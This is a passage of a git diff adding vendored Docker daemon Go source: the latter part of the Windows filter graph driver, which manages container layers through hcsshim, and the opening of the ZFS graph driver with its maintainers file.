+	"golang.org/x/sys/windows"
+)
+
+// filterDriver is an HCSShim driver type for the Windows Filter driver.
+const filterDriver = 1
+
+var (
+	// mutatedFiles is a list of files that are mutated by the import process
+	// and must be backed up and restored.
+	mutatedFiles = map[string]string{
+		"UtilityVM/Files/EFI/Microsoft/Boot/BCD":      "bcd.bak",
+		"UtilityVM/Files/EFI/Microsoft/Boot/BCD.LOG":  "bcd.log.bak",
+		"UtilityVM/Files/EFI/Microsoft/Boot/BCD.LOG1": "bcd.log1.bak",
+		"UtilityVM/Files/EFI/Microsoft/Boot/BCD.LOG2": "bcd.log2.bak",
+	}
+	noreexec = false
+)
+
+// init registers the windows graph drivers to the register.
+func init() {
+	graphdriver.Register("windowsfilter", InitFilter)
+	// DOCKER_WINDOWSFILTER_NOREEXEC allows for inline processing which makes
+	// debugging issues in the re-exec codepath significantly easier.
+	if os.Getenv("DOCKER_WINDOWSFILTER_NOREEXEC") != "" {
+		logrus.Warnf("WindowsGraphDriver is set to not re-exec. This is intended for debugging purposes only.")
+		noreexec = true
+	} else {
+		reexec.Register("docker-windows-write-layer", writeLayerReexec)
+	}
+}
+
+type checker struct {
+}
+
+func (c *checker) IsMounted(path string) bool {
+	return false
+}
+
+// Driver represents a windows graph driver.
+type Driver struct {
+	// info stores the shim driver information
+	info hcsshim.DriverInfo
+	ctr  *graphdriver.RefCounter
+	// it is safe for windows to use a cache here because it does not support
+	// restoring containers when the daemon dies.
+	cacheMu sync.Mutex
+	cache   map[string]string
+}
+
+// InitFilter returns a new Windows storage filter driver.
+func InitFilter(home string, options []string, uidMaps, gidMaps []idtools.IDMap) (graphdriver.Driver, error) {
+	logrus.Debugf("WindowsGraphDriver InitFilter at %s", home)
+
+	fsType, err := getFileSystemType(string(home[0]))
+	if err != nil {
+		return nil, err
+	}
+	if strings.ToLower(fsType) == "refs" {
+		return nil, fmt.Errorf("%s is on an ReFS volume - ReFS volumes are not supported", home)
+	}
+
+	d := &Driver{
+		info: hcsshim.DriverInfo{
+			HomeDir: home,
+			Flavour: filterDriver,
+		},
+		cache: make(map[string]string),
+		ctr:   graphdriver.NewRefCounter(&checker{}),
+	}
+	return d, nil
+}
+
+// win32FromHresult is a helper function to get the win32 error code from an HRESULT
+func win32FromHresult(hr uintptr) uintptr {
+	if hr&0x1fff0000 == 0x00070000 {
+		return hr & 0xffff
+	}
+	return hr
+}
+
+// getFileSystemType obtains the type of a file system through GetVolumeInformation
+// https://msdn.microsoft.com/en-us/library/windows/desktop/aa364993(v=vs.85).aspx
+func getFileSystemType(drive string) (fsType string, hr error) {
+	var (
+		modkernel32              = windows.NewLazySystemDLL("kernel32.dll")
+		procGetVolumeInformation = modkernel32.NewProc("GetVolumeInformationW")
+		buf                      = make([]uint16, 255)
+		size                     = syscall.MAX_PATH + 1
+	)
+	if len(drive) != 1 {
+		hr = errors.New("getFileSystemType must be called with a drive letter")
+		return
+	}
+	drive += `:\`
+	n := uintptr(unsafe.Pointer(nil))
+	r0, _, _ := syscall.Syscall9(procGetVolumeInformation.Addr(), 8, uintptr(unsafe.Pointer(syscall.StringToUTF16Ptr(drive))), n, n, n, n, n, uintptr(unsafe.Pointer(&buf[0])), uintptr(size), 0)
+	if int32(r0) < 0 {
+		hr = syscall.Errno(win32FromHresult(r0))
+	}
+	fsType = syscall.UTF16ToString(buf)
+	return
+}
+
+// String returns the string representation of a driver. This should match
+// the name the graph driver has been registered with.
+func (d *Driver) String() string {
+	return "windowsfilter"
+}
+
+// Status returns the status of the driver.
+func (d *Driver) Status() [][2]string {
+	return [][2]string{
+		{"Windows", ""},
+	}
+}
+
+// Exists returns true if the given id is registered with this driver.
+func (d *Driver) Exists(id string) bool {
+	rID, err := d.resolveID(id)
+	if err != nil {
+		return false
+	}
+	result, err := hcsshim.LayerExists(d.info, rID)
+	if err != nil {
+		return false
+	}
+	return result
+}
+
+// CreateReadWrite creates a layer that is writable for use as a container
+// file system.
+func (d *Driver) CreateReadWrite(id, parent string, opts *graphdriver.CreateOpts) error {
+	if opts != nil {
+		return d.create(id, parent, opts.MountLabel, false, opts.StorageOpt)
+	}
+	return d.create(id, parent, "", false, nil)
+}
+
+// Create creates a new read-only layer with the given id.
+func (d *Driver) Create(id, parent string, opts *graphdriver.CreateOpts) error {
+	if opts != nil {
+		return d.create(id, parent, opts.MountLabel, true, opts.StorageOpt)
+	}
+	return d.create(id, parent, "", true, nil)
+}
+
+func (d *Driver) create(id, parent, mountLabel string, readOnly bool, storageOpt map[string]string) error {
+	rPId, err := d.resolveID(parent)
+	if err != nil {
+		return err
+	}
+
+	parentChain, err := d.getLayerChain(rPId)
+	if err != nil {
+		return err
+	}
+
+	var layerChain []string
+
+	if rPId != "" {
+		parentPath, err := hcsshim.GetLayerMountPath(d.info, rPId)
+		if err != nil {
+			return err
+		}
+		if _, err := os.Stat(filepath.Join(parentPath, "Files")); err == nil {
+			// This is a legitimate parent layer (not the empty "-init" layer),
+			// so include it in the layer chain.
+			layerChain = []string{parentPath}
+		}
+	}
+
+	layerChain = append(layerChain, parentChain...)
+
+	if readOnly {
+		if err := hcsshim.CreateLayer(d.info, id, rPId); err != nil {
+			return err
+		}
+	} else {
+		var parentPath string
+		if len(layerChain) != 0 {
+			parentPath = layerChain[0]
+		}
+
+		if err := hcsshim.CreateSandboxLayer(d.info, id, parentPath, layerChain); err != nil {
+			return err
+		}
+
+		storageOptions, err := parseStorageOpt(storageOpt)
+		if err != nil {
+			return fmt.Errorf("Failed to parse storage options - %s", err)
+		}
+
+		if storageOptions.size != 0 {
+			if err := hcsshim.ExpandSandboxSize(d.info, id, storageOptions.size); err != nil {
+				return err
+			}
+		}
+	}
+
+	if _, err := os.Lstat(d.dir(parent)); err != nil {
+		if err2 := hcsshim.DestroyLayer(d.info, id); err2 != nil {
+			logrus.Warnf("Failed to DestroyLayer %s: %s", id, err2)
+		}
+		return fmt.Errorf("Cannot create layer with missing parent %s: %s", parent, err)
+	}
+
+	if err := d.setLayerChain(id, layerChain); err != nil {
+		if err2 := hcsshim.DestroyLayer(d.info, id); err2 != nil {
+			logrus.Warnf("Failed to DestroyLayer %s: %s", id, err2)
+		}
+		return err
+	}
+
+	return nil
+}
+
+// dir returns the absolute path to the layer.
+func (d *Driver) dir(id string) string {
+	return filepath.Join(d.info.HomeDir, filepath.Base(id))
+}
+
+// Remove unmounts and removes the dir information.
+func (d *Driver) Remove(id string) error {
+	rID, err := d.resolveID(id)
+	if err != nil {
+		return err
+	}
+
+	// This retry loop is due to a bug in Windows (Internal bug #9432268)
+	// if GetContainers fails with ErrVmcomputeOperationInvalidState
+	// it is a transient error. Retry until it succeeds.
+	var computeSystems []hcsshim.ContainerProperties
+	retryCount := 0
+	for {
+		// Get and terminate any template VMs that are currently using the layer
+		computeSystems, err = hcsshim.GetContainers(hcsshim.ComputeSystemQuery{})
+		if err != nil {
+			if err == hcsshim.ErrVmcomputeOperationInvalidState {
+				if retryCount >= 5 {
+					// If we are unable to get the list of containers
+					// go ahead and attempt to delete the layer anyway
+					// as it will most likely work.
+					break
+				}
+				retryCount++
+				time.Sleep(2 * time.Second)
+				continue
+			}
+			return err
+		}
+		break
+	}
+
+	for _, computeSystem := range computeSystems {
+		if strings.Contains(computeSystem.RuntimeImagePath, id) && computeSystem.IsRuntimeTemplate {
+			container, err := hcsshim.OpenContainer(computeSystem.ID)
+			if err != nil {
+				return err
+			}
+			defer container.Close()
+			err = container.Terminate()
+			if hcsshim.IsPending(err) {
+				err = container.Wait()
+			} else if hcsshim.IsAlreadyStopped(err) {
+				err = nil
+			}
+
+			if err != nil {
+				return err
+			}
+		}
+	}
+
+	layerPath := filepath.Join(d.info.HomeDir, rID)
+	tmpID := fmt.Sprintf("%s-removing", rID)
+	tmpLayerPath := filepath.Join(d.info.HomeDir, tmpID)
+	if err := os.Rename(layerPath, tmpLayerPath); err != nil && !os.IsNotExist(err) {
+		return err
+	}
+	if err := hcsshim.DestroyLayer(d.info, tmpID); err != nil {
+		logrus.Errorf("Failed to DestroyLayer %s: %s", id, err)
+	}
+
+	return nil
+}
+
+// Get returns the rootfs path for the id. This will mount the dir at its given path.
+func (d *Driver) Get(id, mountLabel string) (string, error) {
+	logrus.Debugf("WindowsGraphDriver Get() id %s mountLabel %s", id, mountLabel)
+	var dir string
+
+	rID, err := d.resolveID(id)
+	if err != nil {
+		return "", err
+	}
+	if count := d.ctr.Increment(rID); count > 1 {
+		return d.cache[rID], nil
+	}
+
+	// Getting the layer paths must be done outside of the lock.
+	layerChain, err := d.getLayerChain(rID)
+	if err != nil {
+		d.ctr.Decrement(rID)
+		return "", err
+	}
+
+	if err := hcsshim.ActivateLayer(d.info, rID); err != nil {
+		d.ctr.Decrement(rID)
+		return "", err
+	}
+	if err := hcsshim.PrepareLayer(d.info, rID, layerChain); err != nil {
+		d.ctr.Decrement(rID)
+		if err2 := hcsshim.DeactivateLayer(d.info, rID); err2 != nil {
+			logrus.Warnf("Failed to Deactivate %s: %s", id, err)
+		}
+		return "", err
+	}
+
+	mountPath, err := hcsshim.GetLayerMountPath(d.info, rID)
+	if err != nil {
+		d.ctr.Decrement(rID)
+		if err2 := hcsshim.DeactivateLayer(d.info, rID); err2 != nil {
+			logrus.Warnf("Failed to Deactivate %s: %s", id, err)
+		}
+		return "", err
+	}
+	d.cacheMu.Lock()
+	d.cache[rID] = mountPath
+	d.cacheMu.Unlock()
+
+	// If the layer has a mount path, use that. Otherwise, use the
+	// folder path.
+	if mountPath != "" {
+		dir = mountPath
+	} else {
+		dir = d.dir(id)
+	}
+
+	return dir, nil
+}
+
+// Put adds a new layer to the driver.
+func (d *Driver) Put(id string) error {
+	logrus.Debugf("WindowsGraphDriver Put() id %s", id)
+
+	rID, err := d.resolveID(id)
+	if err != nil {
+		return err
+	}
+	if count := d.ctr.Decrement(rID); count > 0 {
+		return nil
+	}
+	d.cacheMu.Lock()
+	delete(d.cache, rID)
+	d.cacheMu.Unlock()
+
+	if err := hcsshim.UnprepareLayer(d.info, rID); err != nil {
+		return err
+	}
+	return hcsshim.DeactivateLayer(d.info, rID)
+}
+
+// Cleanup ensures the information the driver stores is properly removed.
+func (d *Driver) Cleanup() error {
+	return nil
+}
+
+// Diff produces an archive of the changes between the specified
+// layer and its parent layer which may be "".
+// The layer should be mounted when calling this function
+func (d *Driver) Diff(id, parent string) (_ io.ReadCloser, err error) {
+	rID, err := d.resolveID(id)
+	if err != nil {
+		return
+	}
+
+	layerChain, err := d.getLayerChain(rID)
+	if err != nil {
+		return
+	}
+
+	// this is assuming that the layer is unmounted
+	if err := hcsshim.UnprepareLayer(d.info, rID); err != nil {
+		return nil, err
+	}
+	prepare := func() {
+		if err := hcsshim.PrepareLayer(d.info, rID, layerChain); err != nil {
+			logrus.Warnf("Failed to Deactivate %s: %s", rID, err)
+		}
+	}
+
+	arch, err := d.exportLayer(rID, layerChain)
+	if err != nil {
+		prepare()
+		return
+	}
+	return ioutils.NewReadCloserWrapper(arch, func() error {
+		err := arch.Close()
+		prepare()
+		return err
+	}), nil
+}
+
+// Changes produces a list of changes between the specified layer
+// and its parent layer. If parent is "", then all changes will be ADD changes.
+// The layer should not be mounted when calling this function.
+func (d *Driver) Changes(id, parent string) ([]archive.Change, error) {
+	rID, err := d.resolveID(id)
+	if err != nil {
+		return nil, err
+	}
+	parentChain, err := d.getLayerChain(rID)
+	if err != nil {
+		return nil, err
+	}
+
+	if err := hcsshim.ActivateLayer(d.info, rID); err != nil {
+		return nil, err
+	}
+	defer func() {
+		if err2 := hcsshim.DeactivateLayer(d.info, rID); err2 != nil {
+			logrus.Errorf("changes() failed to DeactivateLayer %s %s: %s", id, rID, err2)
+		}
+	}()
+
+	var changes []archive.Change
+	err = winio.RunWithPrivilege(winio.SeBackupPrivilege, func() error {
+		r, err := hcsshim.NewLayerReader(d.info, id, parentChain)
+		if err != nil {
+			return err
+		}
+		defer r.Close()
+
+		for {
+			name, _, fileInfo, err := r.Next()
+			if err == io.EOF {
+				return nil
+			}
+			if err != nil {
+				return err
+			}
+			name = filepath.ToSlash(name)
+			if fileInfo == nil {
+				changes = append(changes, archive.Change{Path: name, Kind: archive.ChangeDelete})
+			} else {
+				// Currently there is no way to tell between an add and a modify.
+				changes = append(changes, archive.Change{Path: name, Kind: archive.ChangeModify})
+			}
+		}
+	})
+	if err != nil {
+		return nil, err
+	}
+
+	return changes, nil
+}
+
+// ApplyDiff extracts the changeset from the given diff into the
+// layer with the specified id and parent, returning the size of the
+// new layer in bytes.
+// The layer should not be mounted when calling this function
+func (d *Driver) ApplyDiff(id, parent string, diff io.Reader) (int64, error) {
+	var layerChain []string
+	if parent != "" {
+		rPId, err := d.resolveID(parent)
+		if err != nil {
+			return 0, err
+		}
+		parentChain, err := d.getLayerChain(rPId)
+		if err != nil {
+			return 0, err
+		}
+		parentPath, err := hcsshim.GetLayerMountPath(d.info, rPId)
+		if err != nil {
+			return 0, err
+		}
+		layerChain = append(layerChain, parentPath)
+		layerChain = append(layerChain, parentChain...)
+	}
+
+	size, err := d.importLayer(id, diff, layerChain)
+	if err != nil {
+		return 0, err
+	}
+
+	if err = d.setLayerChain(id, layerChain); err != nil {
+		return 0, err
+	}
+
+	return size, nil
+}
+
+// DiffSize calculates the changes between the specified layer
+// and its parent and returns the size in bytes of the changes
+// relative to its base filesystem directory.
+func (d *Driver) DiffSize(id, parent string) (size int64, err error) {
+	rPId, err := d.resolveID(parent)
+	if err != nil {
+		return
+	}
+
+	changes, err := d.Changes(id, rPId)
+	if err != nil {
+		return
+	}
+
+	layerFs, err := d.Get(id, "")
+	if err != nil {
+		return
+	}
+	defer d.Put(id)
+
+	return archive.ChangesSize(layerFs, changes), nil
+}
+
+// GetMetadata returns custom driver information.
+func (d *Driver) GetMetadata(id string) (map[string]string, error) {
+	m := make(map[string]string)
+	m["dir"] = d.dir(id)
+	return m, nil
+}
+
+func writeTarFromLayer(r hcsshim.LayerReader, w io.Writer) error {
+	t := tar.NewWriter(w)
+	for {
+		name, size, fileInfo, err := r.Next()
+		if err == io.EOF {
+			break
+		}
+		if err != nil {
+			return err
+		}
+		if fileInfo == nil {
+			// Write a whiteout file.
+			hdr := &tar.Header{
+				Name: filepath.ToSlash(filepath.Join(filepath.Dir(name), archive.WhiteoutPrefix+filepath.Base(name))),
+			}
+			err := t.WriteHeader(hdr)
+			if err != nil {
+				return err
+			}
+		} else {
+			err = backuptar.WriteTarFileFromBackupStream(t, r, name, size, fileInfo)
+			if err != nil {
+				return err
+			}
+		}
+	}
+	return t.Close()
+}
+
+// exportLayer generates an archive from a layer based on the given ID.
+func (d *Driver) exportLayer(id string, parentLayerPaths []string) (io.ReadCloser, error) {
+	archive, w := io.Pipe()
+	go func() {
+		err := winio.RunWithPrivilege(winio.SeBackupPrivilege, func() error {
+			r, err := hcsshim.NewLayerReader(d.info, id, parentLayerPaths)
+			if err != nil {
+				return err
+			}
+
+			err = writeTarFromLayer(r, w)
+			cerr := r.Close()
+			if err == nil {
+				err = cerr
+			}
+			return err
+		})
+		w.CloseWithError(err)
+	}()
+
+	return archive, nil
+}
+
+// writeBackupStreamFromTarAndSaveMutatedFiles reads data from a tar stream and
+// writes it to a backup stream, and also saves any files that will be mutated
+// by the import layer process to a backup location.
+func writeBackupStreamFromTarAndSaveMutatedFiles(buf *bufio.Writer, w io.Writer, t *tar.Reader, hdr *tar.Header, root string) (nextHdr *tar.Header, err error) {
+	var bcdBackup *os.File
+	var bcdBackupWriter *winio.BackupFileWriter
+	if backupPath, ok := mutatedFiles[hdr.Name]; ok {
+		bcdBackup, err = os.Create(filepath.Join(root, backupPath))
+		if err != nil {
+			return nil, err
+		}
+		defer func() {
+			cerr := bcdBackup.Close()
+			if err == nil {
+				err = cerr
+			}
+		}()
+
+		bcdBackupWriter = winio.NewBackupFileWriter(bcdBackup, false)
+		defer func() {
+			cerr := bcdBackupWriter.Close()
+			if err == nil {
+				err = cerr
+			}
+		}()
+
+		buf.Reset(io.MultiWriter(w, bcdBackupWriter))
+	} else {
+		buf.Reset(w)
+	}
+
+	defer func() {
+		ferr := buf.Flush()
+		if err == nil {
+			err = ferr
+		}
+	}()
+
+	return backuptar.WriteBackupStreamFromTarFile(buf, t, hdr)
+}
+
+func writeLayerFromTar(r io.Reader, w hcsshim.LayerWriter, root string) (int64, error) {
+	t := tar.NewReader(r)
+	hdr, err := t.Next()
+	totalSize := int64(0)
+	buf := bufio.NewWriter(nil)
+	for err == nil {
+		base := path.Base(hdr.Name)
+		if strings.HasPrefix(base, archive.WhiteoutPrefix) {
+			name := path.Join(path.Dir(hdr.Name), base[len(archive.WhiteoutPrefix):])
+			err = w.Remove(filepath.FromSlash(name))
+			if err != nil {
+				return 0, err
+			}
+			hdr, err = t.Next()
+		} else if hdr.Typeflag == tar.TypeLink {
+			err = w.AddLink(filepath.FromSlash(hdr.Name), filepath.FromSlash(hdr.Linkname))
+			if err != nil {
+				return 0, err
+			}
+			hdr, err = t.Next()
+		} else {
+			var (
+				name     string
+				size     int64
+				fileInfo *winio.FileBasicInfo
+			)
+			name, size, fileInfo, err = backuptar.FileInfoFromHeader(hdr)
+			if err != nil {
+				return 0, err
+			}
+			err = w.Add(filepath.FromSlash(name), fileInfo)
+			if err != nil {
+				return 0, err
+			}
+			hdr, err = writeBackupStreamFromTarAndSaveMutatedFiles(buf, w, t, hdr, root)
+			totalSize += size
+		}
+	}
+	if err != io.EOF {
+		return 0, err
+	}
+	return totalSize, nil
+}
+
+// importLayer adds a new layer to the tag and graph store based on the given data.
+func (d *Driver) importLayer(id string, layerData io.Reader, parentLayerPaths []string) (size int64, err error) {
+	if !noreexec {
+		cmd := reexec.Command(append([]string{"docker-windows-write-layer", d.info.HomeDir, id}, parentLayerPaths...)...)
+		output := bytes.NewBuffer(nil)
+		cmd.Stdin = layerData
+		cmd.Stdout = output
+		cmd.Stderr = output
+
+		if err = cmd.Start(); err != nil {
+			return
+		}
+
+		if err = cmd.Wait(); err != nil {
+			return 0, fmt.Errorf("re-exec error: %v: output: %s", err, output)
+		}
+
+		return strconv.ParseInt(output.String(), 10, 64)
+	}
+	return writeLayer(layerData, d.info.HomeDir, id, parentLayerPaths...)
+}
+
+// writeLayerReexec is the re-exec entry point for writing a layer from a tar file
+func writeLayerReexec() {
+	size, err := writeLayer(os.Stdin, os.Args[1], os.Args[2], os.Args[3:]...)
+	if err != nil {
+		fmt.Fprint(os.Stderr, err)
+		os.Exit(1)
+	}
+	fmt.Fprint(os.Stdout, size)
+}
+
+// writeLayer writes a layer from a tar file.
+func writeLayer(layerData io.Reader, home string, id string, parentLayerPaths ...string) (int64, error) {
+	err := winio.EnableProcessPrivileges([]string{winio.SeBackupPrivilege, winio.SeRestorePrivilege})
+	if err != nil {
+		return 0, err
+	}
+	if noreexec {
+		defer func() {
+			if err := winio.DisableProcessPrivileges([]string{winio.SeBackupPrivilege, winio.SeRestorePrivilege}); err != nil {
+				// This should never happen, but just in case when in debugging mode.
+				// See https://github.com/docker/docker/pull/28002#discussion_r86259241 for rationale.
+				panic("Failed to disabled process privileges while in non re-exec mode")
+			}
+		}()
+	}
+
+	info := hcsshim.DriverInfo{
+		Flavour: filterDriver,
+		HomeDir: home,
+	}
+
+	w, err := hcsshim.NewLayerWriter(info, id, parentLayerPaths)
+	if err != nil {
+		return 0, err
+	}
+
+	size, err := writeLayerFromTar(layerData, w, filepath.Join(home, id))
+	if err != nil {
+		return 0, err
+	}
+
+	err = w.Close()
+	if err != nil {
+		return 0, err
+	}
+
+	return size, nil
+}
+
+// resolveID computes the layerID information based on the given id.
+func (d *Driver) resolveID(id string) (string, error) {
+	content, err := ioutil.ReadFile(filepath.Join(d.dir(id), "layerID"))
+	if os.IsNotExist(err) {
+		return id, nil
+	} else if err != nil {
+		return "", err
+	}
+	return string(content), nil
+}
+
+// setID stores the layerId in disk.
+func (d *Driver) setID(id, altID string) error {
+	err := ioutil.WriteFile(filepath.Join(d.dir(id), "layerId"), []byte(altID), 0600)
+	if err != nil {
+		return err
+	}
+	return nil
+}
+
+// getLayerChain returns the layer chain information.
+func (d *Driver) getLayerChain(id string) ([]string, error) {
+	jPath := filepath.Join(d.dir(id), "layerchain.json")
+	content, err := ioutil.ReadFile(jPath)
+	if os.IsNotExist(err) {
+		return nil, nil
+	} else if err != nil {
+		return nil, fmt.Errorf("Unable to read layerchain file - %s", err)
+	}
+
+	var layerChain []string
+	err = json.Unmarshal(content, &layerChain)
+	if err != nil {
+		return nil, fmt.Errorf("Failed to unmarshall layerchain json - %s", err)
+	}
+
+	return layerChain, nil
+}
+
+// setLayerChain stores the layer chain information in disk.
+func (d *Driver) setLayerChain(id string, chain []string) error {
+	content, err := json.Marshal(&chain)
+	if err != nil {
+		return fmt.Errorf("Failed to marshall layerchain json - %s", err)
+	}
+
+	jPath := filepath.Join(d.dir(id), "layerchain.json")
+	err = ioutil.WriteFile(jPath, content, 0600)
+	if err != nil {
+		return fmt.Errorf("Unable to write layerchain file - %s", err)
+	}
+
+	return nil
+}
+
+type fileGetCloserWithBackupPrivileges struct {
+	path string
+}
+
+func (fg *fileGetCloserWithBackupPrivileges) Get(filename string) (io.ReadCloser, error) {
+	if backupPath, ok := mutatedFiles[filename]; ok {
+		return os.Open(filepath.Join(fg.path, backupPath))
+	}
+
+	var f *os.File
+	// Open the file while holding the Windows backup privilege. This ensures that the
+	// file can be opened even if the caller does not actually have access to it according
+	// to the security descriptor.
+	err := winio.RunWithPrivilege(winio.SeBackupPrivilege, func() error {
+		path := longpath.AddPrefix(filepath.Join(fg.path, filename))
+		p, err := syscall.UTF16FromString(path)
+		if err != nil {
+			return err
+		}
+		h, err := syscall.CreateFile(&p[0], syscall.GENERIC_READ, syscall.FILE_SHARE_READ, nil, syscall.OPEN_EXISTING, syscall.FILE_FLAG_BACKUP_SEMANTICS, 0)
+		if err != nil {
+			return &os.PathError{Op: "open", Path: path, Err: err}
+		}
+		f = os.NewFile(uintptr(h), path)
+		return nil
+	})
+	return f, err
+}
+
+func (fg *fileGetCloserWithBackupPrivileges) Close() error {
+	return nil
+}
+
+// DiffGetter returns a FileGetCloser that can read files from the directory that
+// contains files for the layer differences. Used for direct access for tar-split.
+func (d *Driver) DiffGetter(id string) (graphdriver.FileGetCloser, error) {
+	id, err := d.resolveID(id)
+	if err != nil {
+		return nil, err
+	}
+
+	return &fileGetCloserWithBackupPrivileges{d.dir(id)}, nil
+}
+
+type storageOptions struct {
+	size uint64
+}
+
+func parseStorageOpt(storageOpt map[string]string) (*storageOptions, error) {
+	options := storageOptions{}
+
+	// Read size to change the block device size per container.
+	for key, val := range storageOpt {
+		key := strings.ToLower(key)
+		switch key {
+		case "size":
+			size, err := units.RAMInBytes(val)
+			if err != nil {
+				return nil, err
+			}
+			options.size = uint64(size)
+		default:
+			return nil, fmt.Errorf("Unknown storage option: %s", key)
+		}
+	}
+	return &options, nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/zfs/MAINTAINERS b/vendor/github.com/docker/docker/daemon/graphdriver/zfs/MAINTAINERS
new file mode 100644
index 0000000000..9c270c541f
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/zfs/MAINTAINERS
@@ -0,0 +1,2 @@
+Jörg Thalheim <joerg@higgsboson.tk> (@Mic92)
+Arthur Gautier <baloo@gandi.net> (@baloose)
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs.go b/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs.go
new file mode 100644
index 0000000000..8e283ccf40
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs.go
@@ -0,0 +1,417 @@
+// +build linux freebsd solaris
+
+package zfs
+
+import (
+	"fmt"
+	"os"
+	"os/exec"
+	"path"
+	"strconv"
+	"strings"
+	"sync"
+	"syscall"
+	"time"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/daemon/graphdriver"
+	"github.com/docker/docker/pkg/idtools"
+	"github.com/docker/docker/pkg/mount"
+	"github.com/docker/docker/pkg/parsers"
+	zfs "github.com/mistifyio/go-zfs"
+	"github.com/opencontainers/runc/libcontainer/label"
+)
+
+type zfsOptions struct {
+	fsName    string
+	mountPath string
+}
+
+func init() {
+	graphdriver.Register("zfs", Init)
+}
+
+// Logger returns a zfs logger implementation.
+type Logger struct{}
+
+// Log wraps log message from ZFS driver with a prefix '[zfs]'.
+func (*Logger) Log(cmd []string) {
+	logrus.Debugf("[zfs] %s", strings.Join(cmd, " "))
+}
+
+// Init returns a new ZFS driver.
+// It takes base mount path and an array of options which are represented as key value pairs.
+// Each option is in the for key=value. 'zfs.fsname' is expected to be a valid key in the options.
+func Init(base string, opt []string, uidMaps, gidMaps []idtools.IDMap) (graphdriver.Driver, error) {
+	var err error
+
+	if _, err := exec.LookPath("zfs"); err != nil {
+		logrus.Debugf("[zfs] zfs command is not available: %v", err)
+		return nil, graphdriver.ErrPrerequisites
+	}
+
+	file, err := os.OpenFile("/dev/zfs", os.O_RDWR, 600)
+	if err != nil {
+		logrus.Debugf("[zfs] cannot open /dev/zfs: %v", err)
+		return nil, graphdriver.ErrPrerequisites
+	}
+	defer file.Close()
+
+	options, err := parseOptions(opt)
+	if err != nil {
+		return nil, err
+	}
+	options.mountPath = base
+
+	rootdir := path.Dir(base)
+
+	if options.fsName == "" {
+		err = checkRootdirFs(rootdir)
+		if err != nil {
+			return nil, err
+		}
+	}
+
+	if options.fsName == "" {
+		options.fsName, err = lookupZfsDataset(rootdir)
+		if err != nil {
+			return nil, err
+		}
+	}
+
+	zfs.SetLogger(new(Logger))
+
+	filesystems, err := zfs.Filesystems(options.fsName)
+	if err != nil {
+		return nil, fmt.Errorf("Cannot find root filesystem %s: %v", options.fsName, err)
+	}
+
+	filesystemsCache := make(map[string]bool, len(filesystems))
+	var rootDataset *zfs.Dataset
+	for _, fs := range filesystems {
+		if fs.Name == options.fsName {
+			rootDataset = fs
+		}
+		filesystemsCache[fs.Name] = true
+	}
+
+	if rootDataset == nil {
+		return nil, fmt.Errorf("BUG: zfs get all -t filesystem -rHp '%s' should contain '%s'", options.fsName, options.fsName)
+	}
+
+	rootUID, rootGID, err := idtools.GetRootUIDGID(uidMaps, gidMaps)
+	if err != nil {
+		return nil, fmt.Errorf("Failed to get root uid/guid: %v", err)
+	}
+	if err := idtools.MkdirAllAs(base, 0700, rootUID, rootGID); err != nil {
+		return nil, fmt.Errorf("Failed to create '%s': %v", base, err)
+	}
+
+	if err := mount.MakePrivate(base); err != nil {
+		return nil, err
+	}
+	d := &Driver{
+		dataset:          rootDataset,
+		options:          options,
+		filesystemsCache: filesystemsCache,
+		uidMaps:          uidMaps,
+		gidMaps:          gidMaps,
+		ctr:              graphdriver.NewRefCounter(graphdriver.NewDefaultChecker()),
+	}
+	return graphdriver.NewNaiveDiffDriver(d, uidMaps, gidMaps), nil
+}
+
+func parseOptions(opt []string) (zfsOptions, error) {
+	var options zfsOptions
+	options.fsName = ""
+	for _, option := range opt {
+		key, val, err := parsers.ParseKeyValueOpt(option)
+		if err != nil {
+			return options, err
+		}
+		key = strings.ToLower(key)
+		switch key {
+		case "zfs.fsname":
+			options.fsName = val
+		default:
+			return options, fmt.Errorf("Unknown option %s", key)
+		}
+	}
+	return options, nil
+}
+
+func lookupZfsDataset(rootdir string) (string, error) {
+	var stat syscall.Stat_t
+	if err := syscall.Stat(rootdir, &stat); err != nil {
+		return "", fmt.Errorf("Failed to access '%s': %s", rootdir, err)
+	}
+	wantedDev := stat.Dev
+
+	mounts, err := mount.GetMounts()
+	if err != nil {
+		return "", err
+	}
+	for _, m := range mounts {
+		if err := syscall.Stat(m.Mountpoint, &stat); err != nil {
+			logrus.Debugf("[zfs] failed to stat '%s' while scanning for zfs mount: %v", m.Mountpoint, err)
+			continue // may fail on fuse file systems
+		}
+
+		if stat.Dev == wantedDev && m.Fstype == "zfs" {
+			return m.Source, nil
+		}
+	}
+
+	return "", fmt.Errorf("Failed to find zfs dataset mounted on '%s' in /proc/mounts", rootdir)
+}
+
+// Driver holds information about the driver, such as zfs dataset, options and cache.
+type Driver struct {
+	dataset          *zfs.Dataset
+	options          zfsOptions
+	sync.Mutex       // protects filesystem cache against concurrent access
+	filesystemsCache map[string]bool
+	uidMaps          []idtools.IDMap
+	gidMaps          []idtools.IDMap
+	ctr              *graphdriver.RefCounter
+}
+
+func (d *Driver) String() string {
+	return "zfs"
+}
+
+// Cleanup is used to implement graphdriver.ProtoDriver. There is no cleanup required for this driver.
+func (d *Driver) Cleanup() error {
+	return nil
+}
+
+// Status returns information about the ZFS filesystem. It returns a two dimensional array of information
+// such as pool name, dataset name, disk usage, parent quota and compression used.
+// Currently it return 'Zpool', 'Zpool Health', 'Parent Dataset', 'Space Used By Parent',
+// 'Space Available', 'Parent Quota' and 'Compression'.
+func (d *Driver) Status() [][2]string {
+	parts := strings.Split(d.dataset.Name, "/")
+	pool, err := zfs.GetZpool(parts[0])
+
+	var poolName, poolHealth string
+	if err == nil {
+		poolName = pool.Name
+		poolHealth = pool.Health
+	} else {
+		poolName = fmt.Sprintf("error while getting pool information %v", err)
+		poolHealth = "not available"
+	}
+
+	quota := "no"
+	if d.dataset.Quota != 0 {
+		quota = strconv.FormatUint(d.dataset.Quota, 10)
+	}
+
+	return [][2]string{
+		{"Zpool", poolName},
+		{"Zpool Health", poolHealth},
+		{"Parent Dataset", d.dataset.Name},
+		{"Space Used By Parent", strconv.FormatUint(d.dataset.Used, 10)},
+		{"Space Available", strconv.FormatUint(d.dataset.Avail, 10)},
+		{"Parent Quota", quota},
+		{"Compression", d.dataset.Compression},
+	}
+}
+
+// GetMetadata returns image/container metadata related to graph driver
